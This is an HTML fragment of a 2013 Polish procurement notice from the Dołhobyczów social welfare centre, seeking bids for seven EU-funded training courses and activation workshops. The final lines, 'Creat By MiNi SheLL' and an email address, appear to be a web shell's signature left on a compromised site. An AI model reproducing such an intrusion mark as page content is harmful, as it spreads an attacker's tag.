<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0, 80.51.00.00-2, 80.53.00.00-8, 85.31.23.20-8, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy. 
2.Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy. 
3.Zmiany terminów szkoleń składających się na przedmiot umowy, jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie szkolenia (w szczególności: choroba trenera, siła wyższa, choroba uczestników). 
4.Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. 
5.Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 
6.Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dolhobyczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Dołhobyczowie
ul. Spółdzielcza 2a
22-540 Dołhobyczów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2013 godzina 13:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Dołhobyczowie
ul. Spółdzielcza 2a
22-540 Dołhobyczów
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu VII Promocja Integracji Społecznej
Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji
Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu prawa jazdy kategorii B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu prawa jazdy kategorii B dla 14 osób w wymiarze 60 godzin (30 godzin edukacyjnych (po 45 min.) oraz 30 godzin zegarowych).
Miejsce przeprowadzenia szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013r.
Wykonawca zapewni: 
odpowiednią salę wykładową wyposażoną w odpowiednie oprzyrządowanie techniczne, środki audiowizualne, tablicę, komputery, biurka i krzesła,
odpowiednie materiały szkoleniowe (podręczniki, płyta bądź pendrive), które staną się własnością kursantów,
zajęcia powinny być przeprowadzone przez osoby posiadające odpowiednie uprawnienia do wykładów i instruktora nauki jazdy kategorii B,
przeprowadzenie egzaminu wewnętrznego,
opłaci jeden egzamin państwowy na prawo jazdy w WORD dla uczestnika,
opłaci i przeprowadzi konieczne badania lekarskie dopuszczające kursantów do egzaminu (w tym psychologa),
prowadzenie szczegółowej dokumentacji zajęć, w tym w szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs prawa jazdy kategorii C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs prawa jazdy kategorii C dla 2 osób
Miejsce szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013 r.
Program szkolenia powinien być zgodny z obowiązującymi przepisami, tj. Ustawa o kierujących pojazdami z dnia 5 stycznia 2011 r. (Dz. U. z 2011 nr 30 poz. 151 z dnia 05.01.2011 z póżn. zm.) oraz z ustawą z dnia 20 czerwca 1997- Prawo Ruchu Drogowego (tekst jednolity z Dz.U. z 2005 Nr 108, poz. 908) oraz Rozporządzeniem Ministra Infrastruktury z dnia 27.10.2005 w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień  przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 Nr 217, poz.1834 z późn. zm.)
Wykonawca zapewni:
pomieszczenia w których odbywają się zajęcia muszą być wyposażone w sprzęt techniczno-dydaktyczny,
odpowiednie materiały szkoleniowe (podręczniki, płyta bądź pendrive), które staną się własnością kursantów,
zajęcia powinny być przeprowadzone przez osoby posiadające odpowiednie uprawnienia, w tym instruktora nauki jazdy kategorii C,
liczba godzin kursu powinna wynosić co najmniej 50 godzin, podzielona na część teoretyczna i praktyczną,
przeprowadzenie egzaminu wewnętrznego,
opłacenie jednego egzaminu państwowego na prawo jazdy w WORD dla uczestnika,
zorganizowanie i przeprowadzenie koniecznych badań lekarskich oraz psychologicznych,
prowadzenie szczegółowej dokumentacji zajęć, w tym w szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Obsługa wózka widłowego jezdniowego z wymianą butli gazowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa wózka widłowego jezdniowego z wymianą butli gazowej dla 9 osób
Miejsce szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013 r.
Wykonawca zapewni:
przeprowadzenie 67 godzinnego kursu spełniającego wymagania do wydania uprawnień w zakresie kierowca-operator wózków jezdniowych podnośnikowych wraz z bezpieczną wymianą butli, kurs obejmować musi odpowiednio zagadnienia teoretyczne i praktyczne,
badania lekarskie,
przeprowadzenie zajęć teoretycznych i praktycznych przez osoby z odpowiednimi kwalifikacjami,
prowadzenie szczegółowej dokumentacji zajęć, w tym szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzające ukończenie kursu oraz zezwoleń na kierowanie wózkami jezdniowymi,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs bukieciarstwa i florystyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs bukieciarstwa i florystyki dla 3 osób
Miejsce szkolenia w odległości nie większej niż 30 km od siedziby Zamawiającego.
Termin wykonania zadania: od 01 lipca 2013 r.  do 15 listopada 2013 r.
Wykonawca zapewni:
prowadzenie szczegółowej dokumentacji zajęć, w tym w szczególności dzienniki zajęć, listy obecności,
przeprowadzenie kursu przez osoby z odpowiednimi kwalifikacjami,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Program szkolenia obejmuje :
48 godzin szkolenia (9 edukacyjnych/teoretycznych i 39 zegarowych/praktycznych),
wiedzę na temat teorii barw i kompozycji florystycznych oraz zasad kompozycyjnych.
Zajęcia praktyczne powinny obejmować:
a)sztukę układania kwiatów w naczyniach;
b)dekorację kwiatów doniczkowych;
c)artystyczne pakowanie prezentów;
d)dekorację stołów;
e)florystykę ślubną;
f)florystykę żałobną.
Wykonawca zapewni odpowiedni materiał dydaktyczny, który po realizacji kursu stanie się własnością uczestników 150 zł/osobę  oraz obiad jednodaniowy (drugie danie) oraz kawę /herbatę, napoje, ciastka w łącznej cenie do 20 zł/osoba..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Profesjonalny sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Profesjonalny sprzedawca z obsługą kasy fiskalnej dla 9 osób 
Miejsce szkolenia: Dołhobyczów
Termin wykonania zadania: od 1 lipca 2013r. do 15 listopada 2013r.
Wykonawca zapewni:
56 godzin szkolenia,
przeprowadzenie kursu przez osoby z odpowiednimi kwalifikacjami,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny /co najmniej 3 rodzaje kas fiskalnych/;
materiały szkoleniowo-dydaktyczne, które staną się własnością kursantów,
przeprowadzenie egzaminu sprawdzającego, a po uzyskaniu pozytywnego wyniku uczestnicy uzyskają zaświadczenia,
wykonawca zobowiązany jest prowadzić szczegółową dokumentację zajęć, w tym szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
wyżywienie dzienne w cenie do 20 zł tj. obiad gorący jednodaniowy-drugie danie i kawa, herbata, ciastka,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs kosmetyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kosmetyczny dla 2 osób
Miejsce szkolenia: Hrubieszów
Termin wykonania zadania: od 01 lipca 2013 r. do 15 listopada 2013 r.
Wykonawca zapewni:
100 godzin szkolenia/13 dni  podzielonych na część teoretyczną i praktyczną,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny,
materiały dydaktyczne /szkoleniowe do 150 zł na uczestnika,
przeprowadzenie kursu przez osoby z odpowiednimi kwalifikacjami,
zaświadczenia o ukończeniu kursu zgodnie z obowiązującymi przepisami prawa,
prowadzenie szczegółowej dokumentacji zajęć, w tym szczególności dzienniki zajęć, listy obecności,
po zakończeniu kursu wykonawca dostarczy zamawiającemu kopie dokumentacji kursu oraz kopie zaświadczeń potwierdzających ukończenie kursu,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
obiad jednodaniowy(drugie danie) oraz kawę /herbatę, napoje, ciastka  w łącznej cenie 
do 20 zł/osoba,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Szkolenie powinno obejmować następujące zagadnienia:
pielęgnacja twarzy, ciała, oczu i dłoni,
makijaż dzienny i wieczorowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Organizacja warsztatów aktywizacyjnych oraz indywidualne i grupowe poradnictwo  psychologa a także określenie indywidualnej ścieżki zawodowej poprzez indywidualne oraz grupowe wsparcie doradcy zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja warsztatów aktywizacyjnych oraz indywidualne i grupowe poradnictwo  psychologa a także określenie indywidualnej ścieżki zawodowej poprzez indywidualne oraz grupowe wsparcie doradcy zawodowego dla 20 osób w 2013 roku w terminie od 01 lipca 2013 r. do 30 sierpnia 2013 r. w związku z realizacją projektu pn. Chcę iść naprzód - Program wsparcia osób zagrożonych wykluczeniem społecznym w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Miejsce przeprowadzenia szkolenia: Dołhobyczów
Do obowiązku Wykonawcy w ramach świadczonej usługi należeć będzie: 
1)Zorganizowanie i przeprowadzenie warsztatów aktywizacyjnych wraz z indywidualnym 
i grupowym wsparciem aktywizacyjnym psychologa w roku 2013 r. w wymiarze:
zajęcia grupowe 16 godz.  szkoleniowych (2 dni).
Wykonawca zapewni odpowiedni materiał dydaktyczny (podręczniki, płyta bądź pendrive), który po realizacji kursu stanie się własnością uczestników   oraz wyżywienie dzienne w cenie do 20 zł t. j. obiad gorący jednodaniowy - drugie danie i  kawa, herbata, ciastka,
indywidualne wsparcie 2 godz./ osoba t. j. 40 godz.,
przeprowadzenie warsztatów przez osoby z odpowiednimi kwalifikacjami,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny,
wykonawca zobowiązany jest prowadzić szczegółową dokumentację zajęć, w tym szczególności dzienniki zajęć, 
po zakończeniu warsztatów wykonawca dostarczy zamawiającemu kopie dokumentacji warsztatów oraz kopie zaświadczeń potwierdzających ukończenie warsztatów,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
W ramach warsztatów aktywizacyjnych uczestnicy projektu nabędą wiedzę na temat sposobów rozwiązywania problemów, nabiorą pewności siebie w kontaktach interpersonalnych oraz poznają własne kompetencje społeczne. Odbędą sesje grupowe w formie programów ukierunkowanych na rozwój kompetencji formułowania i realizacji celów zawodowych i prywatnych, projektowania własnego wizerunku, zdrowego trybu życia problematyki równości płci w miejscu pracy i życiu codziennym - wsparcie indywidualne psychologa.
2)Zorganizowanie i przeprowadzenie warsztatów aktywizacyjnych wraz z indywidualnym i grupowym wsparciem aktywizacyjnym doradcy zawodowego w roku 2013 r. w wymiarze:
wsparcie indywidualne 2 godz./ osoba tj. 40 godz.  
zajęcia grupowe 16 godz. szkoleniowych (2 dni).  
Wykonawca zapewni odpowiedni materiał dydaktyczny (podręczniki, płyta bądź pendrive), który po realizacji kursu stanie się własnością uczestników  oraz wyżywienie dzienne w cenie do 20 zł tj. obiad gorący jednodaniowy-drugie danie i  kawa, herbata, ciastka,
przeprowadzenie warsztatów przez osoby z odpowiednimi kwalifikacjami,
pomieszczenia wyposażone w sprzęt techniczno-dydaktyczny,
wykonawca zobowiązany jest prowadzić szczegółową dokumentację zajęć, w tym  szczególności dzienniki zajęć, 
po zakończeniu warsztatów wykonawca dostarczy zamawiającemu kopie dokumentacji warsztatów oraz kopie zaświadczeń potwierdzających ukończenie warsztatów,
przeprowadzenie wśród uczestników ankiet monitorujących i ewaluacyjnych podczas projektu,
oznaczenie pomieszczeń szkoleniowych zgodnie z wytycznymi dotyczącymi oznaczania projektu w ramach Programu Operacyjnego Kapitał Ludzki.
Określenie indywidualnej ścieżki zawodowej poprzez indywidualne wsparcie doradcy zawodowego 2 godz.. Indywidualna praca z doradcą zawodowym określi odpowiedni kurs dla uczestnika projektu. W ramach wsparcia grupowego  doradca zawodowy  pomoże uczestnikom w dotarciu do pracodawcy odpowiadającego ich predyspozycjom poprzez realizację narzędzi diagnostycznych oraz pozwoli na poznanie nowoczesnych narzędzi przeszukiwania ofert pracy 
w celu zwiększania możliwości podjęcia zatrudnienia. Uczestnicy projektu posiądą również umiejętność napisania listu motywacyjnego, życiorysu oraz zaprezentowania się podczas rozmowy kwalifikacyjnej -16 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.23.20-8, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com